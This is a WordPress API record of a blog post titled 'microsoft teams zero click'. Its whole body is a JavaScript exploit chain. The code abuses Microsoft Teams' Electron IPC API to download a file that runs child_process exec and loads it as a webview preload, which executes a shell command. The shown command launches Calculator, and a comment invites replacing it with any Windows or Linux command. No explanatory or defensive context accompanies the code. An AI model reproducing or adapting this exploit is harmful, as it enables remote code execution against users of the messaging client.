{"id":96,"date":"2021-01-02T14:07:00","date_gmt":"2021-01-02T14:07:00","guid":{"rendered":"https:\/\/piratesecurityblog.com\/?p=96"},"modified":"2021-12-20T14:08:58","modified_gmt":"2021-12-20T14:08:58","slug":"microsoft-teams-zero-click","status":"publish","type":"post","link":"https:\/\/piratesecurityblog.com\/?p=96","title":{"rendered":"microsoft teams zero click"},"content":{"rendered":"\n<pre class=\"wp-block-preformatted\">cmd = `open \/System\/Applications\/Calculator.app` \/\/ change to windows\/linux command as required\n\nstage1 = `data:text\/plain,cp=require('child_process');cp.exec('${cmd}')`; \/\/ create a virtual file to download\nthis.electronSafeIpc.send(`desktopFileDownload`, stage1); \/\/ request to download file\n\n\/\/ implement an event handler when files downloaded to trigger payload\nthis.electronSafeIpc.on(`desktop-file-download-finished`, (_, fileinfo) =&gt; { \n        f = fileinfo.uniqueFile.filePath; \/\/ event gives us file path which we don't know beforehand\n        \n        \/\/ create a new webview mockup - window with a webview tag and our virtual, downloaded file as preload\n        stage2 = `data:text\/html,&lt;webview src='about:blank' preload='file:\/\/\/${f}'&gt;&lt;\/webview&gt;`\n        this.electronSafeIpc.send(`allowWindowOpenUrl`, stage2); \/\/ abusing MS Teams IPC API to allow above URL\n        this.w = window.open(stage2); \/\/ URL gets opened, webview gets created with our virtual, downloaded file preload\n        setTimeout(()=&gt;{this.w.close()},1000) \/\/ not necessary, but let's close the custom window\n    }\n)<\/pre>\n","protected":false},"excerpt":{"rendered":"<p>cmd = `open \/System\/Applications\/Calculator.app` \/\/ change to windows\/linux command as required stage1 = `data:text\/plain,cp=require(&#8216;child_process&#8217;);cp.exec(&#8216;${cmd}&#8217;)`; \/\/ create a virtual file to download this.electronSafeIpc.send(`desktopFileDownload`, stage1); \/\/ request to download file \/\/ implement an event handler when files downloaded to trigger payload this.electronSafeIpc.on(`desktop-file-download-finished`, (_, fileinfo) =&gt; { f = fileinfo.uniqueFile.filePath; \/\/ event gives us file path which we &hellip; <a href=\"https:\/\/piratesecurityblog.com\/?p=96\" class=\"more-link\">Continue reading <span class=\"screen-reader-text\">microsoft teams zero click<\/span><\/a><\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":[],"categories":[1],"tags":[],"_links":{"self":[{"href":"https:\/\/piratesecurityblog.com\/index.php?rest_route=\/wp\/v2\/posts\/96"}],"collection":[{"href":"https:\/\/piratesecurityblog.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/piratesecurityblog.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/piratesecurityblog.com\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/piratesecurityblog.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=96"}],"version-history":[{"count":1,"href":"https:\/\/piratesecurityblog.com\/index.php?rest_route=\/wp\/v2\/posts\/96\/revisions"}],"predecessor-version":[{"id":97,"href":"https:\/\/piratesecurityblog.com\/index.php?rest_route=\/wp\/v2\/posts\/96\/revisions\/97"}],"wp:attachment":[{"href":"https:\/\/piratesecurityblog.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=96"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/piratesecurityblog.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=96"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/piratesecurityblog.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=96"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}